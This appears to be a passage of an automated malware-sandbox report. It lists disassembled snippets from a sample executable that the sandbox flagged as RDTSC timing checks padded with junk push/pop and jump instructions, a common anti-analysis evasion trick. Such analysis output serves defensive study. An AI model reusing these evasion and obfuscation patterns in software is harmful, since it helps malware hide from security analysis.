Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D81FA second address: 10D821F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnc 00007F08ED2385E6h 0x0000000d jmp 00007F08ED2385F7h 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D821F second address: 10D8225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D6AA2 second address: 10D6AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D6AA6 second address: 10D6AAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D6AAA second address: 10D6ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F08ED2385E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DB948 second address: 10DB955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F08ED2F2E86h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DB955 second address: 10DB959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DB959 second address: 10DB95F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109A888 second address: 1079EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F08ED2385E8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 call dword ptr [ebp+124596D0h] 0x0000002a pushad 0x0000002b push ebx 0x0000002c push edx 0x0000002d pop edx 0x0000002e pop ebx 0x0000002f jmp 00007F08ED2385EFh 0x00000034 pushad 0x00000035 jns 00007F08ED2385E6h 0x0000003b jne 00007F08ED2385E6h 0x00000041 push edi 0x00000042 pop edi 0x00000043 popad 0x00000044 jne 00007F08ED2385ECh 0x0000004a popad 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e push edx 0x0000004f pop edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109A998 second address: 109A9A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109AA7A second address: 109AA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08ED2385ECh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109AA8B second address: 109AAAB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007F08ED2F2E86h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F08ED2F2E90h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109ADFF second address: 109AE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109AECE second address: 109AF4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jnl 00007F08ED2F2E98h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007F08ED2F2E91h 0x00000017 pop eax 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F08ED2F2E88h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 jmp 00007F08ED2F2E97h 0x00000037 call 00007F08ED2F2E89h 0x0000003c pushad 0x0000003d push ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109AF4A second address: 109AF81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 je 00007F08ED2385E8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push esi 0x00000010 jnl 00007F08ED2385ECh 0x00000016 pop esi 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b pushad 0x0000001c jmp 00007F08ED2385F2h 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109AF81 second address: 109AF93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F08ED2F2E88h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109B00D second address: 109B012 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109B156 second address: 109B15C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109B15C second address: 109B160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109B160 second address: 109B184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109B184 second address: 109B197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109B197 second address: 109B19D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109B19D second address: 109B1B4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F08ED2385E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109B1B4 second address: 109B1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109B1B9 second address: 109B1BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109B2C0 second address: 109B2C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109B2C5 second address: 109B2CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109B86D second address: 109B8E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F08ED2F2E88h 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007F08ED2F2E96h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F08ED2F2E88h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push 0000001Eh 0x00000030 movzx edi, si 0x00000033 nop 0x00000034 jo 00007F08ED2F2E9Bh 0x0000003a pushad 0x0000003b pushad 0x0000003c popad 0x0000003d jmp 00007F08ED2F2E91h 0x00000042 popad 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F08ED2F2E90h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109B8E6 second address: 109B8EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109BB10 second address: 109BB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F08ED2F2E86h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109BB1B second address: 109BB21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DC719 second address: 10DC71E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DE29F second address: 10DE2BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EEh 0x00000007 js 00007F08ED2385E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10DE2BC second address: 10DE2E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F08ED2F2E8Ch 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007F08ED2F2E91h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E0DA5 second address: 10E0DAF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F08ED2385E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E0F4B second address: 10E0F57 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnc 00007F08ED2F2E86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E3825 second address: 10E382D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E3385 second address: 10E339C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 ja 00007F08ED2F2E86h 0x0000000c jmp 00007F08ED2F2E8Ah 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E339C second address: 10E33C8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F08ED2385ECh 0x00000008 jl 00007F08ED2385EEh 0x0000000e jne 00007F08ED2385E6h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push ebx 0x0000001a push edx 0x0000001b pop edx 0x0000001c pop ebx 0x0000001d push ebx 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 popad 0x00000022 pop ebx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E33C8 second address: 10E33D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E352C second address: 10E3544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F08ED2385F3h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E6CA4 second address: 10E6CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007F08ED2F2E86h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E6CB2 second address: 10E6CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E6CB6 second address: 10E6CC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E6E4A second address: 10E6E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F08ED2385EEh 0x0000000a jmp 00007F08ED2385EBh 0x0000000f popad 0x00000010 je 00007F08ED238604h 0x00000016 pushad 0x00000017 jc 00007F08ED2385E6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EB368 second address: 10EB36D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EB36D second address: 10EB387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F08ED2385F4h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EB667 second address: 10EB678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jp 00007F08ED2F2E86h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EB678 second address: 10EB67C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EB7E6 second address: 10EB7EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EB7EA second address: 10EB7F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EB7F0 second address: 10EB815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F08ED2F2E8Fh 0x0000000e jmp 00007F08ED2F2E8Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EB815 second address: 10EB833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F08ED2385F1h 0x0000000c jnl 00007F08ED2385E6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EB833 second address: 10EB84A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F08ED2F2E86h 0x00000008 jmp 00007F08ED2F2E8Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EBADB second address: 10EBAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EBAE1 second address: 10EBB13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E94h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F08ED2F2E95h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EBB13 second address: 10EBB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109B6CA second address: 109B6ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08ED2F2E95h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F1844 second address: 10F1890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F08ED2385E6h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push esi 0x0000000d jp 00007F08ED2385E6h 0x00000013 pop esi 0x00000014 pushad 0x00000015 jmp 00007F08ED2385EAh 0x0000001a jmp 00007F08ED2385F5h 0x0000001f jmp 00007F08ED2385F6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F1890 second address: 10F1898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0DEF second address: 10F0DF9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F08ED2385E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0DF9 second address: 10F0E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F08ED2F2E8Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0E0A second address: 10F0E30 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F08ED2385F9h 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0F84 second address: 10F0F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F08ED2F2E86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0F8E second address: 10F0F9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0F9C second address: 10F0FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007F08ED2F2E97h 0x0000000f jmp 00007F08ED2F2E8Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F1157 second address: 10F1188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F08ED2385F3h 0x0000000a popad 0x0000000b jmp 00007F08ED2385F0h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F1188 second address: 10F11AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F08ED2F2E97h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e js 00007F08ED2F2E86h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F11AF second address: 10F11B9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F08ED2385ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F144B second address: 10F1451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F1451 second address: 10F1467 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F08ED2385F2h 0x0000000e jnl 00007F08ED2385E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F87AE second address: 10F87B4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F87B4 second address: 10F87C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F08ED2385E6h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F6971 second address: 10F6975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F6975 second address: 10F6995 instructions: 0x00000000 rdtsc 0x00000002 je 00007F08ED2385E6h 0x00000008 jmp 00007F08ED2385F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F6995 second address: 10F699A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F6EAD second address: 10F6EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F6EB2 second address: 10F6EE2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F08ED2F2E8Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007F08ED2F2EAAh 0x00000014 jmp 00007F08ED2F2E94h 0x00000019 push eax 0x0000001a push edx 0x0000001b jnl 00007F08ED2F2E86h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F7A21 second address: 10F7A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385F5h 0x00000009 je 00007F08ED2385E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F8277 second address: 10F827E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FD989 second address: 10FD98D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11015D8 second address: 11015EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F08ED2F2E92h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11015EF second address: 11015F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11015F4 second address: 1101627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007F08ED2F2E86h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ebx 0x00000014 ja 00007F08ED2F2E9Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1101627 second address: 110162B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1100EFB second address: 1100F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1101071 second address: 1101077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1101077 second address: 110107D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
